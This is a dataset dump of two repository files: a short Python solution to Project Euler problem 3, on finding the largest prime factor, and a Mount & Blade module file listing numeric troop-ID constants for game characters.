e339f0c761d6c2bb7b67070fb36681d99eeb199e | 70d9bc1d92614e2bfed537dbad1c2f13f1b154bb | /p3.py | f03270ea4183594dd1335f883fe1594b4c027885 | [] | no_license | victorotazu/euler-problems | 5a6ec55ce1604a0ec905081b8b98432220f4baea | 6fdb86b584c97efc33f1d152b0bdc823c08f1233 | refs/heads/master | 2020-04-20T16:07:10.396831 | 2019-02-03T22:15:39 | 2019-02-03T22:15:39 | 168,949,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | # The prime factors of 13195 are 5, 7, 13 and 29.
# What is the largest prime factor of the number 600851475143 ?
def get_factors(number):
r = range(2,number)
seq = []
index = 0
dividend = number
while index < len(r) and int(dividend/r[index]) > 0:
if dividend % r[index] == 0:
seq.append(r[index])
dividend = int(dividend/r[index])
else:
index+=1
return seq
print(max(get_factors(600851475143)))
| [
"votazu.estrada@gmail.com"
] | votazu.estrada@gmail.com |
22900498c115119817f07e69930809a02c0285ec | a0698cf30d33e629a214850564a60dabd70f071b | /Module_system 1.166/ID_troops.py | c477bfe68e2a15fd06f8dc093c2c5e0204040e82 | [] | no_license | OmerTheGreat/Kader-Mini | 89c3feca100c827d48a36c1a5be31b62971ffbb0 | 75a8b5adde14dd72df1dc067deaa576dd3b3e4ac | refs/heads/master | 2020-12-25T06:04:57.267606 | 2016-07-11T19:26:05 | 2016-07-11T19:26:05 | 63,090,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,428 | py | trp_player = 0
trp_multiplayer_profile_troop_male = 1
trp_multiplayer_profile_troop_female = 2
trp_temp_troop = 3
trp_find_item_cheat = 4
trp_random_town_sequence = 5
trp_tournament_participants = 6
trp_tutorial_maceman = 7
trp_tutorial_archer = 8
trp_tutorial_swordsman = 9
trp_novice_fighter = 10
trp_regular_fighter = 11
trp_veteran_fighter = 12
trp_champion_fighter = 13
trp_arena_training_fighter_1 = 14
trp_arena_training_fighter_2 = 15
trp_arena_training_fighter_3 = 16
trp_arena_training_fighter_4 = 17
trp_arena_training_fighter_5 = 18
trp_arena_training_fighter_6 = 19
trp_arena_training_fighter_7 = 20
trp_arena_training_fighter_8 = 21
trp_arena_training_fighter_9 = 22
trp_arena_training_fighter_10 = 23
trp_cattle = 24
trp_farmer = 25
trp_townsman = 26
trp_watchman = 27
trp_caravan_guard = 28
trp_mercenary_swordsman = 29
trp_hired_blade = 30
trp_mercenary_crossbowman = 31
trp_mercenary_horseman = 32
trp_mercenary_cavalry = 33
trp_mercenaries_end = 34
trp_swadian_recruit = 35
trp_swadian_militia = 36
trp_swadian_footman = 37
trp_swadian_infantry = 38
trp_swadian_sergeant = 39
trp_swadian_skirmisher = 40
trp_swadian_crossbowman = 41
trp_swadian_sharpshooter = 42
trp_swadian_man_at_arms = 43
trp_swadian_knight = 44
trp_swadian_messenger = 45
trp_swadian_deserter = 46
trp_swadian_prison_guard = 47
trp_swadian_castle_guard = 48
trp_vaegir_recruit = 49
trp_vaegir_footman = 50
trp_vaegir_skirmisher = 51
trp_vaegir_archer = 52
trp_vaegir_marksman = 53
trp_vaegir_veteran = 54
trp_vaegir_infantry = 55
trp_vaegir_guard = 56
trp_vaegir_horseman = 57
trp_vaegir_knight = 58
trp_vaegir_messenger = 59
trp_vaegir_deserter = 60
trp_vaegir_prison_guard = 61
trp_vaegir_castle_guard = 62
trp_khergit_tribesman = 63
trp_khergit_skirmisher = 64
trp_khergit_horseman = 65
trp_khergit_horse_archer = 66
trp_khergit_veteran_horse_archer = 67
trp_khergit_lancer = 68
trp_khergit_messenger = 69
trp_khergit_deserter = 70
trp_khergit_prison_guard = 71
trp_khergit_castle_guard = 72
trp_nord_recruit = 73
trp_nord_footman = 74
trp_nord_trained_footman = 75
trp_nord_warrior = 76
trp_nord_veteran = 77
trp_nord_champion = 78
trp_nord_huntsman = 79
trp_nord_archer = 80
trp_nord_veteran_archer = 81
trp_nord_messenger = 82
trp_nord_deserter = 83
trp_nord_prison_guard = 84
trp_nord_castle_guard = 85
trp_rhodok_tribesman = 86
trp_rhodok_spearman = 87
trp_rhodok_trained_spearman = 88
trp_rhodok_veteran_spearman = 89
trp_rhodok_sergeant = 90
trp_rhodok_crossbowman = 91
trp_rhodok_trained_crossbowman = 92
trp_rhodok_veteran_crossbowman = 93
trp_rhodok_sharpshooter = 94
trp_rhodok_messenger = 95
trp_rhodok_deserter = 96
trp_rhodok_prison_guard = 97
trp_rhodok_castle_guard = 98
trp_sarranid_recruit = 99
trp_sarranid_footman = 100
trp_sarranid_veteran_footman = 101
trp_sarranid_infantry = 102
trp_sarranid_guard = 103
trp_sarranid_skirmisher = 104
trp_sarranid_archer = 105
trp_sarranid_master_archer = 106
trp_sarranid_horseman = 107
trp_sarranid_mamluke = 108
trp_sarranid_messenger = 109
trp_sarranid_deserter = 110
trp_sarranid_prison_guard = 111
trp_sarranid_castle_guard = 112
trp_looter = 113
trp_bandit = 114
trp_brigand = 115
trp_mountain_bandit = 116
trp_forest_bandit = 117
trp_sea_raider = 118
trp_steppe_bandit = 119
trp_taiga_bandit = 120
trp_desert_bandit = 121
trp_black_khergit_horseman = 122
trp_manhunter = 123
trp_slave_driver = 124
trp_slave_hunter = 125
trp_slave_crusher = 126
trp_slaver_chief = 127
trp_follower_woman = 128
trp_hunter_woman = 129
trp_fighter_woman = 130
trp_sword_sister = 131
trp_refugee = 132
trp_peasant_woman = 133
trp_caravan_master = 134
trp_kidnapped_girl = 135
trp_town_walker_1 = 136
trp_town_walker_2 = 137
trp_khergit_townsman = 138
trp_khergit_townswoman = 139
trp_sarranid_townsman = 140
trp_sarranid_townswoman = 141
trp_village_walker_1 = 142
trp_village_walker_2 = 143
trp_spy_walker_1 = 144
trp_spy_walker_2 = 145
trp_tournament_master = 146
trp_trainer = 147
trp_constable_hareck = 148
trp_ramun_the_slave_trader = 149
trp_guide = 150
trp_xerina = 151
trp_dranton = 152
trp_kradus = 153
trp_tutorial_trainer = 154
trp_tutorial_student_1 = 155
trp_tutorial_student_2 = 156
trp_tutorial_student_3 = 157
trp_tutorial_student_4 = 158
trp_galeas = 159
trp_farmer_from_bandit_village = 160
trp_trainer_1 = 161
trp_trainer_2 = 162
trp_trainer_3 = 163
trp_trainer_4 = 164
trp_trainer_5 = 165
trp_ransom_broker_1 = 166
trp_ransom_broker_2 = 167
trp_ransom_broker_3 = 168
trp_ransom_broker_4 = 169
trp_ransom_broker_5 = 170
trp_ransom_broker_6 = 171
trp_ransom_broker_7 = 172
trp_ransom_broker_8 = 173
trp_ransom_broker_9 = 174
trp_ransom_broker_10 = 175
trp_tavern_traveler_1 = 176
trp_tavern_traveler_2 = 177
trp_tavern_traveler_3 = 178
trp_tavern_traveler_4 = 179
trp_tavern_traveler_5 = 180
trp_tavern_traveler_6 = 181
trp_tavern_traveler_7 = 182
trp_tavern_traveler_8 = 183
trp_tavern_traveler_9 = 184
trp_tavern_traveler_10 = 185
trp_tavern_bookseller_1 = 186
trp_tavern_bookseller_2 = 187
trp_tavern_minstrel_1 = 188
trp_tavern_minstrel_2 = 189
trp_tavern_minstrel_3 = 190
trp_tavern_minstrel_4 = 191
trp_tavern_minstrel_5 = 192
trp_kingdom_heroes_including_player_begin = 193
trp_npc1 = 194
trp_npc2 = 195
trp_npc3 = 196
trp_npc4 = 197
trp_npc5 = 198
trp_npc6 = 199
trp_npc7 = 200
trp_npc8 = 201
trp_npc9 = 202
trp_npc10 = 203
trp_npc11 = 204
trp_npc12 = 205
trp_npc13 = 206
trp_npc14 = 207
trp_npc15 = 208
trp_npc16 = 209
trp_kingdom_1_lord = 210
trp_kingdom_2_lord = 211
trp_kingdom_3_lord = 212
trp_kingdom_4_lord = 213
trp_kingdom_5_lord = 214
trp_kingdom_6_lord = 215
trp_knight_1_1 = 216
trp_knight_1_2 = 217
trp_knight_1_3 = 218
trp_knight_1_4 = 219
trp_knight_1_5 = 220
trp_knight_1_6 = 221
trp_knight_1_7 = 222
trp_knight_1_8 = 223
trp_knight_1_9 = 224
trp_knight_1_10 = 225
trp_knight_1_11 = 226
trp_knight_1_12 = 227
trp_knight_1_13 = 228
trp_knight_1_14 = 229
trp_knight_1_15 = 230
trp_knight_1_16 = 231
trp_knight_1_17 = 232
trp_knight_1_18 = 233
trp_knight_1_19 = 234
trp_knight_1_20 = 235
trp_knight_2_1 = 236
trp_knight_2_2 = 237
trp_knight_2_3 = 238
trp_knight_2_4 = 239
trp_knight_2_5 = 240
trp_knight_2_6 = 241
trp_knight_2_7 = 242
trp_knight_2_8 = 243
trp_knight_2_9 = 244
trp_knight_2_10 = 245
trp_knight_2_11 = 246
trp_knight_2_12 = 247
trp_knight_2_13 = 248
trp_knight_2_14 = 249
trp_knight_2_15 = 250
trp_knight_2_16 = 251
trp_knight_2_17 = 252
trp_knight_2_18 = 253
trp_knight_2_19 = 254
trp_knight_2_20 = 255
trp_knight_3_1 = 256
trp_knight_3_2 = 257
trp_knight_3_3 = 258
trp_knight_3_4 = 259
trp_knight_3_5 = 260
trp_knight_3_6 = 261
trp_knight_3_7 = 262
trp_knight_3_8 = 263
trp_knight_3_9 = 264
trp_knight_3_10 = 265
trp_knight_3_11 = 266
trp_knight_3_12 = 267
trp_knight_3_13 = 268
trp_knight_3_14 = 269
trp_knight_3_15 = 270
trp_knight_3_16 = 271
trp_knight_3_17 = 272
trp_knight_3_18 = 273
trp_knight_3_19 = 274
trp_knight_3_20 = 275
trp_knight_4_1 = 276
trp_knight_4_2 = 277
trp_knight_4_3 = 278
trp_knight_4_4 = 279
trp_knight_4_5 = 280
trp_knight_4_6 = 281
trp_knight_4_7 = 282
trp_knight_4_8 = 283
trp_knight_4_9 = 284
trp_knight_4_10 = 285
trp_knight_4_11 = 286
trp_knight_4_12 = 287
trp_knight_4_13 = 288
trp_knight_4_14 = 289
trp_knight_4_15 = 290
trp_knight_4_16 = 291
trp_knight_4_17 = 292
trp_knight_4_18 = 293
trp_knight_4_19 = 294
trp_knight_4_20 = 295
trp_knight_5_1 = 296
trp_knight_5_2 = 297
trp_knight_5_3 = 298
trp_knight_5_4 = 299
trp_knight_5_5 = 300
trp_knight_5_6 = 301
trp_knight_5_7 = 302
trp_knight_5_8 = 303
trp_knight_5_9 = 304
trp_knight_5_10 = 305
trp_knight_5_11 = 306
trp_knight_5_12 = 307
trp_knight_5_13 = 308
trp_knight_5_14 = 309
trp_knight_5_15 = 310
trp_knight_5_16 = 311
trp_knight_5_17 = 312
trp_knight_5_18 = 313
trp_knight_5_19 = 314
trp_knight_5_20 = 315
trp_knight_6_1 = 316
trp_knight_6_2 = 317
trp_knight_6_3 = 318
trp_knight_6_4 = 319
trp_knight_6_5 = 320
trp_knight_6_6 = 321
trp_knight_6_7 = 322
trp_knight_6_8 = 323
trp_knight_6_9 = 324
trp_knight_6_10 = 325
trp_knight_6_11 = 326
trp_knight_6_12 = 327
trp_knight_6_13 = 328
trp_knight_6_14 = 329
trp_knight_6_15 = 330
trp_knight_6_16 = 331
trp_knight_6_17 = 332
trp_knight_6_18 = 333
trp_knight_6_19 = 334
trp_knight_6_20 = 335
trp_kingdom_1_pretender = 336
trp_kingdom_2_pretender = 337
trp_kingdom_3_pretender = 338
trp_kingdom_4_pretender = 339
trp_kingdom_5_pretender = 340
trp_kingdom_6_pretender = 341
trp_knight_1_1_wife = 342
trp_kingdom_1_lady_1 = 343
trp_kingdom_1_lady_2 = 344
trp_knight_1_lady_3 = 345
trp_knight_1_lady_4 = 346
trp_kingdom_l_lady_5 = 347
trp_kingdom_1_lady_6 = 348
trp_kingdom_1_lady_7 = 349
trp_kingdom_1_lady_8 = 350
trp_kingdom_1_lady_9 = 351
trp_kingdom_1_lady_10 = 352
trp_kingdom_1_lady_11 = 353
trp_kingdom_1_lady_12 = 354
trp_kingdom_l_lady_13 = 355
trp_kingdom_1_lady_14 = 356
trp_kingdom_1_lady_15 = 357
trp_kingdom_1_lady_16 = 358
trp_kingdom_1_lady_17 = 359
trp_kingdom_1_lady_18 = 360
trp_kingdom_1_lady_19 = 361
trp_kingdom_1_lady_20 = 362
trp_kingdom_2_lady_1 = 363
trp_kingdom_2_lady_2 = 364
trp_kingdom_2_lady_3 = 365
trp_kingdom_2_lady_4 = 366
trp_kingdom_2_lady_5 = 367
trp_kingdom_2_lady_6 = 368
trp_kingdom_2_lady_7 = 369
trp_kingdom_2_lady_8 = 370
trp_kingdom_2_lady_9 = 371
trp_kingdom_2_lady_10 = 372
trp_kingdom_2_lady_11 = 373
trp_kingdom_2_lady_12 = 374
trp_kingdom_2_lady_13 = 375
trp_kingdom_2_lady_14 = 376
trp_kingdom_2_lady_15 = 377
trp_kingdom_2_lady_16 = 378
trp_kingdom_2_lady_17 = 379
trp_kingdom_2_lady_18 = 380
trp_kingdom_2_lady_19 = 381
trp_kingdom_2_lady_20 = 382
trp_kingdom_3_lady_1 = 383
trp_kingdom_3_lady_2 = 384
trp_kingdom_3_lady_3 = 385
trp_kingdom_3_lady_4 = 386
trp_kingdom_3_lady_5 = 387
trp_kingdom_3_lady_6 = 388
trp_kingdom_3_lady_7 = 389
trp_kingdom_3_lady_8 = 390
trp_kingdom_3_lady_9 = 391
trp_kingdom_3_lady_10 = 392
trp_kingdom_3_lady_11 = 393
trp_kingdom_3_lady_12 = 394
trp_kingdom_3_lady_13 = 395
trp_kingdom_3_lady_14 = 396
trp_kingdom_3_lady_15 = 397
trp_kingdom_3_lady_16 = 398
trp_kingdom_3_lady_17 = 399
trp_kingdom_3_lady_18 = 400
trp_kingdom_3_lady_19 = 401
trp_kingdom_3_lady_20 = 402
trp_kingdom_4_lady_1 = 403
trp_kingdom_4_lady_2 = 404
trp_kingdom_4_lady_3 = 405
trp_kingdom_4_lady_4 = 406
trp_kingdom_4_lady_5 = 407
trp_kingdom_4_lady_6 = 408
trp_kingdom_4_lady_7 = 409
trp_knight_4_2b_daughter_1 = 410
trp_kingdom_4_lady_9 = 411
trp_knight_4_2c_wife_1 = 412
trp_kingdom_4_lady_11 = 413
trp_knight_4_2c_daughter = 414
trp_knight_4_1b_wife = 415
trp_kingdom_4_lady_14 = 416
trp_knight_4_1b_daughter = 417
trp_knight_4_2b_daughter_2 = 418
trp_kingdom_4_lady_17 = 419
trp_knight_4_2c_wife_2 = 420
trp_knight_4_1c_daughter = 421
trp_kingdom_4_lady_20 = 422
trp_kingdom_5_lady_1 = 423
trp_kingdom_5_lady_2 = 424
trp_kingdom_5_lady_3 = 425
trp_kingdom_5_lady_4 = 426
trp_kingdom_5_5_wife = 427
trp_kingdom_5_2b_wife_1 = 428
trp_kingdom_5_1c_daughter_1 = 429
trp_kingdom_5_2c_daughter_1 = 430
trp_kingdom_5_1c_wife_1 = 431
trp_kingdom_5_2c_wife_1 = 432
trp_kingdom_5_1c_daughter_2 = 433
trp_kingdom_5_2c_daughter_2 = 434
trp_kingdom_5_1b_wife = 435
trp_kingdom_5_2b_wife_2 = 436
trp_kingdom_5_1c_daughter_3 = 437
trp_kingdom_5_lady_16 = 438
trp_kingdom_5_1c_wife_2 = 439
trp_kingdom_5_2c_wife_2 = 440
trp_kingdom_5_1c_daughter_4 = 441
trp_kingdom_5_lady_20 = 442
trp_kingdom_6_lady_1 = 443
trp_kingdom_6_lady_2 = 444
trp_kingdom_6_lady_3 = 445
trp_kingdom_6_lady_4 = 446
trp_kingdom_6_lady_5 = 447
trp_kingdom_6_lady_6 = 448
trp_kingdom_6_lady_7 = 449
trp_kingdom_6_lady_8 = 450
trp_kingdom_6_lady_9 = 451
trp_kingdom_6_lady_10 = 452
trp_kingdom_6_lady_11 = 453
trp_kingdom_6_lady_12 = 454
trp_kingdom_6_lady_13 = 455
trp_kingdom_6_lady_14 = 456
trp_kingdom_6_lady_15 = 457
trp_kingdom_6_lady_16 = 458
trp_kingdom_6_lady_17 = 459
trp_kingdom_6_lady_18 = 460
trp_kingdom_6_lady_19 = 461
trp_kingdom_6_lady_20 = 462
trp_heroes_end = 463
trp_town_1_seneschal = 464
trp_town_2_seneschal = 465
trp_town_3_seneschal = 466
trp_town_4_seneschal = 467
trp_town_5_seneschal = 468
trp_town_6_seneschal = 469
trp_town_7_seneschal = 470
trp_town_8_seneschal = 471
trp_town_9_seneschal = 472
trp_town_10_seneschal = 473
trp_town_11_seneschal = 474
trp_town_12_seneschal = 475
trp_town_13_seneschal = 476
trp_town_14_seneschal = 477
trp_town_15_seneschal = 478
trp_town_16_seneschal = 479
trp_town_17_seneschal = 480
trp_town_18_seneschal = 481
trp_town_19_seneschal = 482
trp_town_20_seneschal = 483
trp_town_21_seneschal = 484
trp_town_22_seneschal = 485
trp_castle_1_seneschal = 486
trp_castle_2_seneschal = 487
trp_castle_3_seneschal = 488
trp_castle_4_seneschal = 489
trp_castle_5_seneschal = 490
trp_castle_6_seneschal = 491
trp_castle_7_seneschal = 492
trp_castle_8_seneschal = 493
trp_castle_9_seneschal = 494
trp_castle_10_seneschal = 495
trp_castle_11_seneschal = 496
trp_castle_12_seneschal = 497
trp_castle_13_seneschal = 498
trp_castle_14_seneschal = 499
trp_castle_15_seneschal = 500
trp_castle_16_seneschal = 501
trp_castle_17_seneschal = 502
trp_castle_18_seneschal = 503
trp_castle_19_seneschal = 504
trp_castle_20_seneschal = 505
trp_castle_21_seneschal = 506
trp_castle_22_seneschal = 507
trp_castle_23_seneschal = 508
trp_castle_24_seneschal = 509
trp_castle_25_seneschal = 510
trp_castle_26_seneschal = 511
trp_castle_27_seneschal = 512
trp_castle_28_seneschal = 513
trp_castle_29_seneschal = 514
trp_castle_30_seneschal = 515
trp_castle_31_seneschal = 516
trp_castle_32_seneschal = 517
trp_castle_33_seneschal = 518
trp_castle_34_seneschal = 519
trp_castle_35_seneschal = 520
trp_castle_36_seneschal = 521
trp_castle_37_seneschal = 522
trp_castle_38_seneschal = 523
trp_castle_39_seneschal = 524
trp_castle_40_seneschal = 525
trp_castle_41_seneschal = 526
trp_castle_42_seneschal = 527
trp_castle_43_seneschal = 528
trp_castle_44_seneschal = 529
trp_castle_45_seneschal = 530
trp_castle_46_seneschal = 531
trp_castle_47_seneschal = 532
trp_castle_48_seneschal = 533
trp_town_1_arena_master = 534
trp_town_2_arena_master = 535
trp_town_3_arena_master = 536
trp_town_4_arena_master = 537
trp_town_5_arena_master = 538
trp_town_6_arena_master = 539
trp_town_7_arena_master = 540
trp_town_8_arena_master = 541
trp_town_9_arena_master = 542
trp_town_10_arena_master = 543
trp_town_11_arena_master = 544
trp_town_12_arena_master = 545
trp_town_13_arena_master = 546
trp_town_14_arena_master = 547
trp_town_15_arena_master = 548
trp_town_16_arena_master = 549
trp_town_17_arena_master = 550
trp_town_18_arena_master = 551
trp_town_19_arena_master = 552
trp_town_20_arena_master = 553
trp_town_21_arena_master = 554
trp_town_22_arena_master = 555
trp_town_1_armorer = 556
trp_town_2_armorer = 557
trp_town_3_armorer = 558
trp_town_4_armorer = 559
trp_town_5_armorer = 560
trp_town_6_armorer = 561
trp_town_7_armorer = 562
trp_town_8_armorer = 563
trp_town_9_armorer = 564
trp_town_10_armorer = 565
trp_town_11_armorer = 566
trp_town_12_armorer = 567
trp_town_13_armorer = 568
trp_town_14_armorer = 569
trp_town_15_armorer = 570
trp_town_16_armorer = 571
trp_town_17_armorer = 572
trp_town_18_armorer = 573
trp_town_19_armorer = 574
trp_town_20_armorer = 575
trp_town_21_armorer = 576
trp_town_22_armorer = 577
trp_town_1_weaponsmith = 578
trp_town_2_weaponsmith = 579
trp_town_3_weaponsmith = 580
trp_town_4_weaponsmith = 581
trp_town_5_weaponsmith = 582
trp_town_6_weaponsmith = 583
trp_town_7_weaponsmith = 584
trp_town_8_weaponsmith = 585
trp_town_9_weaponsmith = 586
trp_town_10_weaponsmith = 587
trp_town_11_weaponsmith = 588
trp_town_12_weaponsmith = 589
trp_town_13_weaponsmith = 590
trp_town_14_weaponsmith = 591
trp_town_15_weaponsmith = 592
trp_town_16_weaponsmith = 593
trp_town_17_weaponsmith = 594
trp_town_18_weaponsmith = 595
trp_town_19_weaponsmith = 596
trp_town_20_weaponsmith = 597
trp_town_21_weaponsmith = 598
trp_town_22_weaponsmith = 599
trp_town_1_tavernkeeper = 600
trp_town_2_tavernkeeper = 601
trp_town_3_tavernkeeper = 602
trp_town_4_tavernkeeper = 603
trp_town_5_tavernkeeper = 604
trp_town_6_tavernkeeper = 605
trp_town_7_tavernkeeper = 606
trp_town_8_tavernkeeper = 607
trp_town_9_tavernkeeper = 608
trp_town_10_tavernkeeper = 609
trp_town_11_tavernkeeper = 610
trp_town_12_tavernkeeper = 611
trp_town_13_tavernkeeper = 612
trp_town_14_tavernkeeper = 613
trp_town_15_tavernkeeper = 614
trp_town_16_tavernkeeper = 615
trp_town_17_tavernkeeper = 616
trp_town_18_tavernkeeper = 617
trp_town_19_tavernkeeper = 618
trp_town_20_tavernkeeper = 619
trp_town_21_tavernkeeper = 620
trp_town_22_tavernkeeper = 621
trp_town_1_merchant = 622
trp_town_2_merchant = 623
trp_town_3_merchant = 624
trp_town_4_merchant = 625
trp_town_5_merchant = 626
trp_town_6_merchant = 627
trp_town_7_merchant = 628
trp_town_8_merchant = 629
trp_town_9_merchant = 630
trp_town_10_merchant = 631
trp_town_11_merchant = 632
trp_town_12_merchant = 633
trp_town_13_merchant = 634
trp_town_14_merchant = 635
trp_town_15_merchant = 636
trp_town_16_merchant = 637
trp_town_17_merchant = 638
trp_town_18_merchant = 639
trp_town_19_merchant = 640
trp_town_20_merchant = 641
trp_town_21_merchant = 642
trp_town_22_merchant = 643
trp_salt_mine_merchant = 644
trp_town_1_horse_merchant = 645
trp_town_2_horse_merchant = 646
trp_town_3_horse_merchant = 647
trp_town_4_horse_merchant = 648
trp_town_5_horse_merchant = 649
trp_town_6_horse_merchant = 650
trp_town_7_horse_merchant = 651
trp_town_8_horse_merchant = 652
trp_town_9_horse_merchant = 653
trp_town_10_horse_merchant = 654
trp_town_11_horse_merchant = 655
trp_town_12_horse_merchant = 656
trp_town_13_horse_merchant = 657
trp_town_14_horse_merchant = 658
trp_town_15_horse_merchant = 659
trp_town_16_horse_merchant = 660
trp_town_17_horse_merchant = 661
trp_town_18_horse_merchant = 662
trp_town_19_horse_merchant = 663
trp_town_20_horse_merchant = 664
trp_town_21_horse_merchant = 665
trp_town_22_horse_merchant = 666
trp_town_1_mayor = 667
trp_town_2_mayor = 668
trp_town_3_mayor = 669
trp_town_4_mayor = 670
trp_town_5_mayor = 671
trp_town_6_mayor = 672
trp_town_7_mayor = 673
trp_town_8_mayor = 674
trp_town_9_mayor = 675
trp_town_10_mayor = 676
trp_town_11_mayor = 677
trp_town_12_mayor = 678
trp_town_13_mayor = 679
trp_town_14_mayor = 680
trp_town_15_mayor = 681
trp_town_16_mayor = 682
trp_town_17_mayor = 683
trp_town_18_mayor = 684
trp_town_19_mayor = 685
trp_town_20_mayor = 686
trp_town_21_mayor = 687
trp_town_22_mayor = 688
trp_village_1_elder = 689
trp_village_2_elder = 690
trp_village_3_elder = 691
trp_village_4_elder = 692
trp_village_5_elder = 693
trp_village_6_elder = 694
trp_village_7_elder = 695
trp_village_8_elder = 696
trp_village_9_elder = 697
trp_village_10_elder = 698
trp_village_11_elder = 699
trp_village_12_elder = 700
trp_village_13_elder = 701
trp_village_14_elder = 702
trp_village_15_elder = 703
trp_village_16_elder = 704
trp_village_17_elder = 705
trp_village_18_elder = 706
trp_village_19_elder = 707
trp_village_20_elder = 708
trp_village_21_elder = 709
trp_village_22_elder = 710
trp_village_23_elder = 711
trp_village_24_elder = 712
trp_village_25_elder = 713
trp_village_26_elder = 714
trp_village_27_elder = 715
trp_village_28_elder = 716
trp_village_29_elder = 717
trp_village_30_elder = 718
trp_village_31_elder = 719
trp_village_32_elder = 720
trp_village_33_elder = 721
trp_village_34_elder = 722
trp_village_35_elder = 723
trp_village_36_elder = 724
trp_village_37_elder = 725
trp_village_38_elder = 726
trp_village_39_elder = 727
trp_village_40_elder = 728
trp_village_41_elder = 729
trp_village_42_elder = 730
trp_village_43_elder = 731
trp_village_44_elder = 732
trp_village_45_elder = 733
trp_village_46_elder = 734
trp_village_47_elder = 735
trp_village_48_elder = 736
trp_village_49_elder = 737
trp_village_50_elder = 738
trp_village_51_elder = 739
trp_village_52_elder = 740
trp_village_53_elder = 741
trp_village_54_elder = 742
trp_village_55_elder = 743
trp_village_56_elder = 744
trp_village_57_elder = 745
trp_village_58_elder = 746
trp_village_59_elder = 747
trp_village_60_elder = 748
trp_village_61_elder = 749
trp_village_62_elder = 750
trp_village_63_elder = 751
trp_village_64_elder = 752
trp_village_65_elder = 753
trp_village_66_elder = 754
trp_village_67_elder = 755
trp_village_68_elder = 756
trp_village_69_elder = 757
trp_village_70_elder = 758
trp_village_71_elder = 759
trp_village_72_elder = 760
trp_village_73_elder = 761
trp_village_74_elder = 762
trp_village_75_elder = 763
trp_village_76_elder = 764
trp_village_77_elder = 765
trp_village_78_elder = 766
trp_village_79_elder = 767
trp_village_80_elder = 768
trp_village_81_elder = 769
trp_village_82_elder = 770
trp_village_83_elder = 771
trp_village_84_elder = 772
trp_village_85_elder = 773
trp_village_86_elder = 774
trp_village_87_elder = 775
trp_village_88_elder = 776
trp_village_89_elder = 777
trp_village_90_elder = 778
trp_village_91_elder = 779
trp_village_92_elder = 780
trp_village_93_elder = 781
trp_village_94_elder = 782
trp_village_95_elder = 783
trp_village_96_elder = 784
trp_village_97_elder = 785
trp_village_98_elder = 786
trp_village_99_elder = 787
trp_village_100_elder = 788
trp_village_101_elder = 789
trp_village_102_elder = 790
trp_village_103_elder = 791
trp_village_104_elder = 792
trp_village_105_elder = 793
trp_village_106_elder = 794
trp_village_107_elder = 795
trp_village_108_elder = 796
trp_village_109_elder = 797
trp_village_110_elder = 798
trp_merchants_end = 799
trp_town_1_master_craftsman = 800
trp_town_2_master_craftsman = 801
trp_town_3_master_craftsman = 802
trp_town_4_master_craftsman = 803
trp_town_5_master_craftsman = 804
trp_town_6_master_craftsman = 805
trp_town_7_master_craftsman = 806
trp_town_8_master_craftsman = 807
trp_town_9_master_craftsman = 808
trp_town_10_master_craftsman = 809
trp_town_11_master_craftsman = 810
trp_town_12_master_craftsman = 811
trp_town_13_master_craftsman = 812
trp_town_14_master_craftsman = 813
trp_town_15_master_craftsman = 814
trp_town_16_master_craftsman = 815
trp_town_17_master_craftsman = 816
trp_town_18_master_craftsman = 817
trp_town_19_master_craftsman = 818
trp_town_20_master_craftsman = 819
trp_town_21_master_craftsman = 820
trp_town_22_master_craftsman = 821
trp_zendar_chest = 822
trp_tutorial_chest_1 = 823
trp_tutorial_chest_2 = 824
trp_bonus_chest_1 = 825
trp_bonus_chest_2 = 826
trp_bonus_chest_3 = 827
trp_household_possessions = 828
trp_temp_array_a = 829
trp_temp_array_b = 830
trp_temp_array_c = 831
trp_stack_selection_amounts = 832
trp_stack_selection_ids = 833
trp_notification_menu_types = 834
trp_notification_menu_var1 = 835
trp_notification_menu_var2 = 836
trp_banner_background_color_array = 837
trp_multiplayer_data = 838
trp_local_merchant = 839
trp_tax_rebel = 840
trp_trainee_peasant = 841
trp_fugitive = 842
trp_belligerent_drunk = 843
trp_hired_assassin = 844
trp_fight_promoter = 845
trp_spy = 846
trp_spy_partner = 847
trp_nurse_for_lady = 848
trp_temporary_minister = 849
trp_quick_battle_6_player = 850
trp_swadian_crossbowman_multiplayer_ai = 851
trp_swadian_infantry_multiplayer_ai = 852
trp_swadian_man_at_arms_multiplayer_ai = 853
trp_vaegir_archer_multiplayer_ai = 854
trp_vaegir_spearman_multiplayer_ai = 855
trp_vaegir_horseman_multiplayer_ai = 856
trp_khergit_dismounted_lancer_multiplayer_ai = 857
trp_khergit_veteran_horse_archer_multiplayer_ai = 858
trp_khergit_lancer_multiplayer_ai = 859
trp_nord_veteran_multiplayer_ai = 860
trp_nord_scout_multiplayer_ai = 861
trp_nord_archer_multiplayer_ai = 862
trp_rhodok_veteran_crossbowman_multiplayer_ai = 863
trp_rhodok_veteran_spearman_multiplayer_ai = 864
trp_rhodok_scout_multiplayer_ai = 865
trp_sarranid_infantry_multiplayer_ai = 866
trp_sarranid_archer_multiplayer_ai = 867
trp_sarranid_horseman_multiplayer_ai = 868
trp_swadian_crossbowman_multiplayer = 869
trp_swadian_infantry_multiplayer = 870
trp_swadian_man_at_arms_multiplayer = 871
trp_vaegir_archer_multiplayer = 872
trp_vaegir_spearman_multiplayer = 873
trp_vaegir_horseman_multiplayer = 874
trp_khergit_veteran_horse_archer_multiplayer = 875
trp_khergit_infantry_multiplayer = 876
trp_khergit_lancer_multiplayer = 877
trp_nord_archer_multiplayer = 878
trp_nord_veteran_multiplayer = 879
trp_nord_scout_multiplayer = 880
trp_rhodok_veteran_crossbowman_multiplayer = 881
trp_rhodok_sergeant_multiplayer = 882
trp_rhodok_horseman_multiplayer = 883
trp_sarranid_archer_multiplayer = 884
trp_sarranid_footman_multiplayer = 885
trp_sarranid_mamluke_multiplayer = 886
trp_multiplayer_end = 887
trp_log_array_entry_type = 888
trp_log_array_entry_time = 889
trp_log_array_actor = 890
trp_log_array_center_object = 891
trp_log_array_center_object_lord = 892
trp_log_array_center_object_faction = 893
trp_log_array_troop_object = 894
trp_log_array_troop_object_faction = 895
trp_log_array_faction_object = 896
trp_quick_battle_troop_1 = 897
trp_quick_battle_troop_2 = 898
trp_quick_battle_troop_3 = 899
trp_quick_battle_troop_4 = 900
trp_quick_battle_troop_5 = 901
trp_quick_battle_troop_6 = 902
trp_quick_battle_troop_7 = 903
trp_quick_battle_troop_8 = 904
trp_quick_battle_troop_9 = 905
trp_quick_battle_troop_10 = 906
trp_quick_battle_troop_11 = 907
trp_quick_battle_troops_end = 908
trp_tutorial_fighter_1 = 909
